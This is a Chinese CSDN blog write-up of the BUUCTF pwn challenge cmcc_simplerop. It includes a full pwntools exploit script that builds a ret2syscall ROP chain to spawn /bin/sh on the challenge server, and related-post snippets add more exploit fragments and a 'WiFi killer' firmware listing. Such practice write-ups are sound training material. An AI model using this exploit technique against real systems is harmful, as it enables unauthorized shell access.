【pwn】cmcc_simplerop --rop链的构造

于 2024-01-12 21:43:07 发布
阅读量542 收藏 6
点赞数 14
文章标签: python 汇编 网络安全 安全 系统安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/135562377
版权

程序保护情况检查

32位程序,堆栈不可执行

主函数:

左边又是一堆函数,file看一下

发现是静态链接,那ret2libc不用考虑了,接着看一下有没有int 80

那可以考虑利用rop链调用execve函数,用系统调用的函数参数是存在寄存器中的,但是本程序找不到/bin/sh的字符串,可以利用read函数读入/bin/sh字符串

然后就是找gadget

exp:

from pwn import *

context(os='linux',arch='i386',log_level='debug')

io=remote("node5.buuoj.cn",26245)

read_plt=0x0806CD50

int_addr=0x080493e1

bin_addr=0x080EA825

pop_edx_ecx_ebx=0x0806e850

pop_eax=0x080bae06

payload=b'a'*(0x1c+0x4)+p32(read_plt)+p32(pop_edx_ecx_ebx)+p32(0)+p32(bin_addr)+p32(8)

payload+=p32(pop_eax)+p32(11)+p32(pop_edx_ecx_ebx)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr)

#第一个payload的pop_edx_ecx_ebx是为了将栈中的三个数据弹出,执行pop_eax

io.recvuntil(b"Your input :")

io.send(payload)

io.sendline(b"/bin/sh\x00")

io.interactive()

GGb0mb
关注
  • 14
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMCC--simplerop 题解
lifanxin的博客
03-28 1517
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP。 然后我们在IDA中定位到main函数,可以
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 762
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
cmcc_simplerop
01-07
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp接: https://blog.csdn.net/A951860555/article/details/115286266
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
cmcc_simplerop解题过程
最新发布
weixin_55013445的博客
09-24 160
cmcc_simplerop解题流程
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 356
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
cmcc Simplerop
Morphy_Amo的博客
03-17 3922
rop
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 240
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 440
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
cmcc_simplerop的wp
wuyvle的博客
03-06 332
函数很多很唬人 但确实不难,很明显要溢出 用ROP看看有没有int80 有,我们可以利用系统调用 再用ROp找找看 就这俩了 int80(11,"/bin/sh",null,null) 后面的四个参数分别是eax、ebx、ecx、edx。 所以上面的两条命令刚刚好。 没有/bin/sh就用read在bss段上写一个 1 from pwn import * 2 3 p = process('./simplerop') 4 context.log_level = 'debug' 5 6 p
buuctf cmcc_simplerop
qq_42728977的博客
04-11 276
系统调用+rop https://www.cnblogs.com/bhxdn/p/12330142.html https://blog.csdn.net/xiaominthere/article/details/17287965
ack_PCS = bit64 << (slave_W-1);
07-28
- *2* *3* [mips&arm&aarch64-pwn初探](https://blog.csdn.net/seaaseesa/article/details/105281585)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值